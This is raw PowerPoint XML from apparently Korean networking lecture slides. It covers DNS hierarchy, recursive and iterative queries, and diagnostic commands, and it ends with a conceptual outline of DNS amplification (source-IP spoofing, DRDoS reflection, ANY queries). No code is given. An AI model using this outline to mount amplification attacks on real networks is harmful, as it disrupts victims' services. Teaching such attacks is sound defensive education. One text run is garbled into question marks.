              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>??????????????????????????????????????????</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t>(2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C426D79A-3192-4FC3-A564-04F86F6FF879}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2523460" y="4538010"/>
            <a:ext cx="6487633" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>음수를 표현하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>를 만들어보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55716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TCP/IP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>프로토콜</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Slowloris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구조 추적</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>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 action="ppaction://noaction"/>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2D29C0A-931E-4457-99B8-E8C367D30B29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="467137" y="2763196"/>
            <a:ext cx="3893521" cy="1883671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그림 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6548CDE2-EDA0-4093-9884-ECC9FDCDBEB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4458287" y="2763196"/>
            <a:ext cx="2966243" cy="1038185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC343611-888D-4094-98FD-13ADDA64400B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538016" y="2144164"/>
            <a:ext cx="224904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ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>8.8.8.8</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C183B34-CB6D-4529-ADF9-70D90F79DDC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4770195" y="2144164"/>
            <a:ext cx="2451476"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nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t> 8.8.8.8</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="그림 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C869600D-BD36-46D2-BB14-A6A71FCA3154}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7522160" y="2763196"/>
            <a:ext cx="4341444" cy="2451534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5ADB0CA-7177-4404-9841-BCDFD3BF95A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8404940" y="2144164"/>
            <a:ext cx="2451476"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tracert 8.8.8.8</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354447747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93995"/>
            <a:ext cx="762000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80214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descr="컴퓨터 네트워크 39장 - 도메인 네임 스페이스(Domain Name Space) -">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAD8057E-801F-454D-A530-487AB48CD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920" y="1690688"/>
            <a:ext cx="4955337" cy="48260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컴퓨터 네트워크 39장 - 도메인 네임 스페이스(Domain Name Space) -">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAD7A59-7C0F-45EF-A52D-0320F360C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5492" y="1603603"/>
            <a:ext cx="2133600" cy="45815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32" name="직선 화살표 연결선 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16D7BF03-1954-41FB-BC68-333CB91F4D04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3494314" y="5641521"/>
            <a:ext cx="4661807" cy="318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360F30F-233E-4C66-A2E9-1DC5DAF274B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10665277" y="5431393"/>
            <a:ext cx="862693" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>level 4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="TextBox 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41E78D56-A556-40ED-94A9-8E6AF5628F97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10646226" y="2400737"/>
            <a:ext cx="862693" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>level 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=TLD</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="TextBox 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2956B1B1-97A5-4074-8369-8F55114373D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10646226" y="3342939"/>
            <a:ext cx="862693" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>level 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=SLD</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31B9C85E-2B90-4EEF-9394-E6A07A429C86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10646227" y="4403449"/>
            <a:ext cx="862693" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>level 3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367353818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32" name="Picture 12" descr="반복적 질의 2단계">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAD7032C-1F53-41D9-8AE1-9E4411349A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077" y="2000251"/>
            <a:ext cx="7597443" cy="363923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직선 화살표 연결선 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{041FED53-C3A7-4ACA-B94B-70E1138E1585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7837714" y="3780064"/>
            <a:ext cx="816429" cy="3265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93315E3D-1D4F-4C71-93C2-A47D7EFD3D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7519307" y="3665764"/>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3660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DNS - 여러분이 google.com을 칠 때 - 웹 부트캠퍼를 위한 컴퓨터 과학">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAAADBC9-C6B3-446A-A5DD-BD7860268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0250"/>
            <a:ext cx="7597443"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313132D2-2E2B-417B-AFD8-B676EE519230}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7862207" y="4212771"/>
            <a:ext cx="767443" cy="11593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FD9A8404-3F1E-449B-8198-C73D4CF6F2DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="4098471"/>
            <a:ext cx="318407"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972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반복적 질의 4단계">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89F58ABF-06D0-48AA-AD87-E74396685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077" y="2008413"/>
            <a:ext cx="7567294" cy="3639233"/>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재귀 쿼리</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755D36D2-9494-4109-B0F8-75A9BCB82EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836571" y="5760534"/>
            <a:ext cx="8238158" cy="646331"/>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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>서버는 재귀적 질의와 반복적 질의 두가지의 시스템이 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>예시는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>재귀적 질의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>시스템 이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398387796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6" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8264202-C8A2-4E1E-BEB8-2ABF183551AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1814235" y="1764674"/>
            <a:ext cx="7688993" cy="3328652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97CF69EE-3687-4A7C-859E-B4395462B98F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751240" y="5033283"/>
            <a:ext cx="7677150" cy="1085850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="그림 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFCABF6F-B4BF-45D9-948C-4B9E6B2D720E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751240" y="6048623"/>
            <a:ext cx="7458075" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165392840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쿼리의 타입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106A686F-8AAA-433A-910E-08D55BE48F14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="709321" y="2017350"/>
            <a:ext cx="4791075" cy="3362325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="그림 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{692509E1-0514-4519-93EE-036E3E468D11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5861277" y="2036400"/>
            <a:ext cx="5400675" cy="3343275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68699342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204357"/>
            <a:ext cx="5821587" cy="41937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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 이용한 트래픽 증폭 공격이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>출발지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>변조를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>통해 공격지로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>response data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 트래픽을 향하게 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>질의에 대한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>인증 절차가 없기 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>때문에 변조가 가능하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>마치 거울에 반사 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>하듯이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 공격 하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DRDOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>종류</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이 과정에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ANY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
